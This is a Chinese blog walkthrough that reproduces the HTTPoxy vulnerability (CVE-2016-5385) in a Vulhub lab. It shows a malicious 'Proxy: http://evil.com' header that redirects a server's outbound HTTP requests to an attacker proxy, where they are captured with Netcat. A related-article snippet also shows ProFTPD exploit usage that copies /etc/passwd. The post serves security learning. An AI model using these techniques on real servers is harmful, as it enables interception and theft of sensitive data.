Vulhub漏洞系列:HTTPoxy漏洞(CVE-2016-5385)

最新推荐文章于 2024-09-08 16:31:34 发布
最新推荐文章于 2024-09-08 16:31:34 发布
阅读量2.4k 收藏 5
点赞数 3
分类专栏: vulhub漏洞复现系列 文章标签: 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43072923/article/details/117016775
版权

Vulhub漏洞系列:HTTPoxy漏洞(CVE-2016-5385)

00.前言:

这篇文章将对该漏洞进行简介并复现,同时简要说明Vulhub的使用方法,适合小白一起学习,大佬看看就好☺

01.HTTPoxy简介

  httpoxy是一个CGI应用环境的远程利用漏洞,影响一系列以PHP为主要代表的Web动态语言和Apache、Nginx等Web服务器。

02.漏洞描述

  根据RFC 3875规定,CGI(fastcgi)要将用户传入的所有HTTP头都加上HTTP_前缀放入环境变量中,而恰好大多数类库约定俗成会提取环境变量中的HTTP_PROXY值作为HTTP代理地址。于是,恶意用户通过提交Proxy: http://evil.com这样的HTTP头,将使用缺陷类库的网站的代理设置为http://evil.com,进而窃取数据包中可能存在的敏感信息。

PHP5.6.24版本修复了该漏洞,不会再将Proxy放入环境变量中。本环境使用PHP 5.6.23为例。

当然,该漏洞不止影响PHP,所有以CGI或Fastcgi运行的程序理论上都受到影响。CVE-2016-5385是PHP的CVE,HTTPoxy所有的CVE编号如下:

  • CVE-2016-5385: PHP
  • CVE-2016-5386: Go
  • CVE-2016-5387: Apache HTTP Server
  • CVE-2016-5388: Apache Tomcat
  • CVE-2016-6286: spiffy-cgi-handlers for CHICKEN
  • CVE-2016-6287: CHICKEN’s http-client
  • CVE-2016-1000104: mod_fcgi
  • CVE-2016-1000105: Nginx cgi script
  • CVE-2016-1000107: Erlang inets
  • CVE-2016-1000108: YAWS
  • CVE-2016-1000109: HHVM FastCGI
  • CVE-2016-1000110: Python CGIHandler
  • CVE-2016-1000111: Python Twisted
  • CVE-2016-1000212: lighttpd

参考链接:https://httpoxy.org/
     http://www.laruence.com/2016/07/19/3101.html

03.漏洞复现

  首先,在vulhub-master中漏洞的相应位置打开终端,输入docker-compose up -d打开环境:

  docker-compose up -d

  然后输入docker ps查看环境是否打开成功:

  docker ps

  接下来便可以开始漏洞的复现了。由于该漏洞是因为部分Web应用框架在发起HTTP请求时,会默认使用系统环境变量HTTP_PROXY值作为代理服务器地址,而CGI标准(RFC 3875)中规定,可以在HTTP请求中通过添加PROXY头,从而修改服务器的环境变量HTTP_PROXY值。基于以上两个前提,可以构造一个巧妙的HTTP请求,劫持截获Web服务后端发起的内部Web业务请求,从而导致后端请求的数据泄露或篡改风险。

https://www.zhihu.com/question/48638584/answer/112348743

  我们开始实操:访问地址http://your-ip:8080/index.php,可见其Origin为当前请求的服务器:
在这里插入图片描述

然后在其他地方启动一个可以正常使用的http代理,如http://*.*.237.251:80/

附带Proxy: http://*.*.237.251:80/头,再次访问http://your-ip:8080/index.php

在这里插入图片描述如上图,可见此时的Origin已经变成*.*.237.251,也就是说真正进行HTTP访问的服务器是*.*.237.251,也就是说*.*.237.251已经将正常的HTTP请求代理了。

*.*.237.251上使用Netcat,就可以捕获当前请求的数据包,其中可能包含敏感数据

最后复现完漏洞就可以关闭环境了:

  docker-compose down

结束语:这是抬锅整理出来的复现过程希望能对大家有帮助☺

ccooll_快乐的抬锅哟
关注
专栏目录
HTTPoxy CGI应用程序漏洞CVE-2016-5385
willow_liang的博客
04-15 1484
CGI简介 CGI(Common Gateway Interface)公共网关接口,是外部扩展应用程序与 Web 服务器交互的一个标准接口。服务器端与客户端进行交互的常见方式多,CGI 技术就是其中之一。根据CGI标准,编写外部扩展应用程序,可以对客户端浏览器输入的数据进行处理,完成客户端与服务器的交互操作。CGI规范定义了Web服务器如何向扩展应用程序发送消息,在收到扩展应用程序的信息后又如何进行处理等内容。对于许多静态的HTML网页无法实现的功能,通过 CGI可以实现,比如表单的处理、对数据库的访问、
Vulhub靶场CGI HTTPoxy漏洞复现(CVE-2016-5385
X_python321的博客
07-26 315
免责声明:本文仅用于技术交流和知识分享目的。漏洞复现涉及到系统和网络的安全性测试,可能导致系统崩溃、数据丢失或其他问题。读者在尝试漏洞复现之前必须获得合法授权,并自行承担一切风险和责任。
HTTPoxy漏洞CVE-2016-5385
EC_Carrot的博客
07-01 447
漏洞背景 PHP 7.0.8及之前的版本中存在安全漏洞,该漏洞源于程序没有解决RFC 3875模式下的命名空间冲突。程序没有正确处理来自HTTP_PROXY环境变量中不可信客户端数据应用程序。远程攻击者借助HTTP请求中特制的Proxy header消息利用该漏洞实施中间人攻击,指引服务器发送连接到任意主机。 漏洞复现 我直接弃坑,但是有几位师傅写的都很不错: https://blog.csdn.net/JiangBuLiu/article/details/95218436 https://blog.cs
vulhub远程执行命令漏洞CVE-2022-22963
最新发布
qq_65852138的博客
09-08 314
vulhub远程执行命令漏洞CVE-2022-22963
vulhubhttpoxy漏洞CVE-2016-5385
qq_45300786的博客
09-13 1135
这个httpoxy漏洞,简单来说,就是可以截获用户http请求包,从而获取到一些敏感信息。 httpoxy简单理解 https://blog.csdn.net/zuoside__lord/article/details/107696503 NC监听 https://blog.csdn.net/qq_34640691/article/details/115740809?utm_medium=distribute.pc_relevant_t0.none-task-blog-2%7Edefault%7ECTRL
HTTPOXY 漏洞
weixin_45593546的博客
07-02 254
长久一来我们习惯了使用一个名为"http_proxy"的环境变量来设置我们的请求代理。 http_proxy=127.0.0.1:9999 wget http://www.laruence.com/ 在CGI(RFC 3875)的模式的时候, 会把请求中的Header, 加上HTTP_ 前缀, 注册为环境变量, 所以如果在Header中发送一个Proxy:xxxxxx, 那么 PHP 就会把他注册为HTTP_PROXY环境变量, 于是getenv(“HTTP_PROXY”)就变成可被控制的了. 那么如果所
PHP HTTPoxy CGI 应用程序漏洞 CVE-2016-5385
qq_42430287的博客
12-21 682
PHP HTTPoxy CGI 应用程序漏洞 CVE-2016-5385
cpx_proftpd:漏洞利用工具 CVE-2015-3306
06-11
Daniel Aldana 针对漏洞利用的 PoC。 Vadim Melihow 报告的错误。 ###方法1: 用法: python cpx_proftp.py <IP> <REMOTE> 前任: python cpx_proftp.py 127.0.0.1 /etc/passwd /var/www/pass.txt 然后尝试...
利用Vulnhub复现漏洞 - HTTPoxy漏洞CVE-2016-5385
JiangBuLiu的博客
07-09 2365
HTTPoxy漏洞CVE-2016-5385Vulnhub官方复现教程漏洞原理复现过程启动环境漏洞复现端口设置浏览器设置BurpSuit设置发出请求 Vulnhub官方复现教程 https://vulhub.org/#/environments/cgi/httpoxy/ 漏洞原理 参考:http://www.laruence.com/2016/07/19/3101.html 简单来说,根据RF...
HTTPOXY漏洞说明
terry198608的博客
03-17 386
这里有一个核心的背景是, 长久一来我们习惯了使用一个名为”http_proxy”的环境变量来设置我们的请求代理, 比如在命令行我们经常这么用: http_proxy=127.0.0.1:9999 wget http://www.laruence.com/ 通过设置一个http_proxy的环境变量, 让wget使用代理请求http://www.laruence.com/ 有据可考的是, 这样
远程代理漏洞httpoxy
张嘉嘉
07-22 1955
今天看了一篇新闻如是说:PHP 、Python 等网站应用远程代理漏洞httpoxy 于是怀着好奇心去搜了一下.具体内容大概如下: 首先 : 这里有一个核心的背景是, 我们习惯了使用一个名为”http_proxy”的环境变量来设置我们的请求代理,比如: http_proxy=127.0.0.1:9999 wget http://www.laruence.com/ 说明 :通过设置一
httpoxy漏洞远程攻击PHP Python应用
weixin_33924220的博客
09-01 254
httpoxy漏洞是一个刚暴露出来的漏洞,它针对 PHP、Go、Python 等语言的 CGI 应用的漏洞。它将apache等组件中用于代理HTTP访问的字段名变换为“HTTP_PROXY”,再传递给对应的CGI来执行。如果CGI或者脚本中对外请求的组件依赖于“HTTP_PROXY”这个环境变量,那就中招了,会导致远程攻击。 HTTP_Proxy...
httpoxy漏洞CVE-2016-5385
温和的跳跃
07-30 1170
在 CGI(RFC 3875) 的模式的时候,会把请求中的 Header,加上HTTP_前缀,注册为环境变量,所以如果你在 Header 中发送一个Proxy:xxxxxx,那么 PHP 就会把他注册为http_proxy环境变量 就是说 你写的proxy会成为人家服务器的http_proxy环境变量,人家服务器以后想通过代理请求点什么,你都会知道。都会被代理到攻击者想要的地址,之后攻击者就可以伪造,监听,篡改你的请求了… 这是目前发现的最好玩的漏洞了 简单又好玩 参考链接 ...
HTTPOXY漏洞下的思考
程序老兵的博客
07-19 912
晚晚刷微博看到最新爆出的httpoxy远程代理感染漏洞的介绍 今天中午看到鸟哥(风雪之隅)博客更新了:http://www.laruence.com/2016/07/19/3101.html 摘录重点: 在CGI(RFC 3875)的模式的时候, 会把请求中的Header, 加上HTTP_ 前缀, 注册为环境变量, 所以如果你在Header中发送一个Proxy:xxxxxx, 那么P
漏洞复现(vulhub tomcat弱口令漏洞
qq_53409748的博客
02-16 844
vulhub上的tomcat弱口令漏洞
Httpoxy远程代理感染漏洞 [转]
weixin_30402085的博客
07-19 211
Httpoxy是一个最新曝出的一个CGI程序漏洞,它主要可能威胁到运行在CGI上的PHP,Go,Python和其他代码程序语言。 0×01 什么是httpoxy? 具体来说, httpoxy是一组影响运行在CGI 或者类似CGI环境的漏洞集,它可以理解为简单的命名空间冲突: RFC 3875(CGI)把HTTP 头部的Proxy 字段名变换成环境变量HTTP_PROXY HTTP_...
HTTPoxy
公众号shadow sock7
05-11 538
这篇讲得非常亲切: https://nakedsecurity.sophos.com/2016/07/19/httpoxy-the-disease-that-could-make-your-web-server-spring-a-leak/ 这个是专门给HTTPoxy这个漏洞的网站: https://httpoxy.org/ 这个来自Laruence的博客: http://www.laru
Tiki组件漏洞复现:CVE-2020-15906和CVE-2021-26119研究
通过上述知识点的详细阐述,我们对tiki组件的两个特定漏洞CVE-2020-15906和CVE-2021-26119有了全面的认识,以及如何在实际环境中复现这些漏洞和采取的防御措施有了深入的理解。安全研究者和系统管理员可以利用这些...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值